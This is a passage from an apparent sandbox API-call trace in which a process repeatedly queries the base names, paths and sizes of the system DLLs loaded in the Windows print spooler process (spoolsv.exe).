lpFilename="C:\\Windows\\System32\\spoolsv.exe" (normalized: "c:\\windows\\system32\\spoolsv.exe")) returned 0x1f [0070.915] CoTaskMemFree (pv=0xd910e0) [0070.915] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2482dd0, cb=0x18 | out: lpmodinfo=0x2482dd0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0070.916] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.916] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0070.916] CoTaskMemFree (pv=0xd910e0) [0070.916] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.916] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0070.917] CoTaskMemFree (pv=0xd910e0) [0070.917] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x2484f90, cb=0x18 | out: lpmodinfo=0x2484f90*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0070.917] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.917] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0070.918] CoTaskMemFree (pv=0xd910e0) [0070.918] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.918] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0070.919] CoTaskMemFree (pv=0xd910e0) [0070.919] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x2487178, cb=0x18 | out: lpmodinfo=0x2487178*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0070.919] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.919] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0070.920] CoTaskMemFree (pv=0xd910e0) [0070.920] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.920] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0070.921] CoTaskMemFree (pv=0xd910e0) [0070.921] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x2489348, cb=0x18 | out: lpmodinfo=0x2489348*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0070.922] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.922] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0070.922] CoTaskMemFree (pv=0xd910e0) [0070.923] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.923] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0070.923] CoTaskMemFree (pv=0xd910e0) [0070.923] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x248b560, cb=0x18 | out: lpmodinfo=0x248b560*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0070.924] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.924] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0070.925] CoTaskMemFree (pv=0xd910e0) [0070.925] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.925] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0070.926] CoTaskMemFree (pv=0xd910e0) [0070.926] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x248d720, cb=0x18 | out: lpmodinfo=0x248d720*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0070.926] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.926] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0070.927] CoTaskMemFree (pv=0xd910e0) [0070.927] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.927] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0070.928] CoTaskMemFree (pv=0xd910e0) [0070.928] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x248f8e0, cb=0x18 | out: lpmodinfo=0x248f8e0*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0070.929] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.929] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0070.930] CoTaskMemFree (pv=0xd910e0) [0070.930] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.930] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0070.931] CoTaskMemFree (pv=0xd910e0) [0070.931] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x2491aa0, cb=0x18 | out: lpmodinfo=0x2491aa0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0070.932] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.932] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0070.933] CoTaskMemFree (pv=0xd910e0) [0070.933] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.933] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0070.934] CoTaskMemFree (pv=0xd910e0) [0070.934] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x2493cf8, cb=0x18 | out: lpmodinfo=0x2493cf8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0070.935] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.935] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0070.936] CoTaskMemFree (pv=0xd910e0) [0070.937] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.937] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0070.938] CoTaskMemFree (pv=0xd910e0) [0070.938] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x2495ea8, cb=0x18 | out: lpmodinfo=0x2495ea8*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0070.939] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.939] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0070.940] CoTaskMemFree (pv=0xd910e0) [0070.940] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.940] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0070.941] CoTaskMemFree (pv=0xd910e0) [0070.941] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb720000, lpmodinfo=0x2498068, cb=0x18 | out: lpmodinfo=0x2498068*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0070.942] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.942] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0070.943] CoTaskMemFree (pv=0xd910e0) [0070.944] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.944] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0070.945] CoTaskMemFree (pv=0xd910e0) [0070.945] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdc80000, lpmodinfo=0x249a238, cb=0x18 | out: lpmodinfo=0x249a238*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0070.946] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.946] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdc80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0070.947] CoTaskMemFree (pv=0xd910e0) [0070.947] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.947] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdc80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0070.948] CoTaskMemFree (pv=0xd910e0) [0070.948] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9a0000, lpmodinfo=0x249c408, cb=0x18 | out: lpmodinfo=0x249c408*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0070.949] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.949] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0070.951] CoTaskMemFree (pv=0xd910e0) [0070.951] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.951] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0070.952] CoTaskMemFree (pv=0xd910e0) [0070.952] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x249e5d8, cb=0x18 | out: lpmodinfo=0x249e5d8*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0070.953] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.953] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0070.955] CoTaskMemFree (pv=0xd910e0) [0070.955] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.955] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0070.956] CoTaskMemFree (pv=0xd910e0) [0070.956] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x24a07a8, cb=0x18 | out: lpmodinfo=0x24a07a8*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0070.957] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.957] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0070.959] CoTaskMemFree (pv=0xd910e0) [0070.959] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.959] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0070.960] CoTaskMemFree (pv=0xd910e0) [0070.960] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x24a2978, cb=0x18 | out: lpmodinfo=0x24a2978*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0070.969] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.969] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0070.970] CoTaskMemFree (pv=0xd910e0) [0070.971] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.971] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0070.972] CoTaskMemFree (pv=0xd910e0) [0070.972] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd980000, lpmodinfo=0x24a4c50, cb=0x18 | out: lpmodinfo=0x24a4c50*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0070.974] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.974] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0070.975] CoTaskMemFree (pv=0xd910e0) [0070.975] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.975] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0070.977] CoTaskMemFree (pv=0xd910e0) [0070.977] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce90000, lpmodinfo=0x24a6e10, cb=0x18 | out: lpmodinfo=0x24a6e10*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0070.978] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.978] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0070.980] CoTaskMemFree (pv=0xd910e0) [0070.980] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.980] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0070.982] CoTaskMemFree (pv=0xd910e0) [0070.982] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x24a8fd0, cb=0x18 | out: lpmodinfo=0x24a8fd0*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0070.994] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.994] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0070.996] CoTaskMemFree (pv=0xd910e0) [0070.996] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.996] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0070.997] CoTaskMemFree (pv=0xd910e0) [0070.997] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x24ab1a8, cb=0x18 | out: lpmodinfo=0x24ab1a8*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0070.999] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.999] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0071.001] CoTaskMemFree (pv=0xd910e0) [0071.001] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.001] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0071.003] CoTaskMemFree (pv=0xd910e0) [0071.003] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x24ad358, cb=0x18 | out: lpmodinfo=0x24ad358*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0071.004] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.004] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0071.006] CoTaskMemFree (pv=0xd910e0) [0071.006] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.006] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0071.008] CoTaskMemFree (pv=0xd910e0) [0071.008] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x24af518, cb=0x18 | out: lpmodinfo=0x24af518*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0071.010] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.010] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0071.012] CoTaskMemFree (pv=0xd910e0) [0071.012] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.012] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0071.014] CoTaskMemFree (pv=0xd910e0) [0071.014] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x24b16d8, cb=0x18 | out: lpmodinfo=0x24b16d8*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0071.016] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.016] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0071.018] CoTaskMemFree (pv=0xd910e0) [0071.018] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.018] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0071.020] CoTaskMemFree (pv=0xd910e0) [0071.020] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb320000, lpmodinfo=0x24b38a8, cb=0x18 | out: lpmodinfo=0x24b38a8*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0071.022] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.022] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb320000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0071.025] CoTaskMemFree (pv=0xd910e0) [0071.025] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.025] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb320000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0071.028] CoTaskMemFree (pv=0xd910e0) [0071.028] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x24b5a58, cb=0x18 | out: lpmodinfo=0x24b5a58*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0071.033] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.033] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0071.036] CoTaskMemFree (pv=0xd910e0) [0071.036] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.036] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0071.039] CoTaskMemFree (pv=0xd910e0) [0071.039] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x24b7c28, cb=0x18 | out: lpmodinfo=0x24b7c28*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0071.041] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.042] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0071.044] CoTaskMemFree (pv=0xd910e0) [0071.045] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.045] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0071.047] CoTaskMemFree (pv=0xd910e0) [0071.047] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x24b9de8, cb=0x18 | out: lpmodinfo=0x24b9de8*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0071.049] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.049] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0071.051] CoTaskMemFree (pv=0xd910e0) [0071.052] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.052] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0071.054] CoTaskMemFree (pv=0xd910e0) [0071.054] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x24bbfa8, cb=0x18 | out: lpmodinfo=0x24bbfa8*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0071.056] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.056] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0071.058] CoTaskMemFree (pv=0xd910e0) [0071.058] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.058] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0071.061] CoTaskMemFree (pv=0xd910e0) [0071.061] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb270000, lpmodinfo=0x24be168, cb=0x18 | out: lpmodinfo=0x24be168*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0071.063] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.063] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb270000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0071.065] CoTaskMemFree (pv=0xd910e0) [0071.065] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.065] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb270000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0071.068] CoTaskMemFree (pv=0xd910e0) [0071.068] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb260000, lpmodinfo=0x24c0338, cb=0x18 | out: lpmodinfo=0x24c0338*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0071.070] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.070] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0071.072] CoTaskMemFree (pv=0xd910e0) [0071.072] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.072] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0071.075] CoTaskMemFree (pv=0xd910e0) [0071.075] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd010000, lpmodinfo=0x24c24f8, cb=0x18 | out: lpmodinfo=0x24c24f8*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0071.083] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.083] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd010000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0071.086] CoTaskMemFree (pv=0xd910e0) [0071.086] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.086] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd010000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0071.088] CoTaskMemFree (pv=0xd910e0) [0071.089] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca10000, lpmodinfo=0x24c46b8, cb=0x18 | out: lpmodinfo=0x24c46b8*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0071.091] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.091] GetModuleBaseNameW 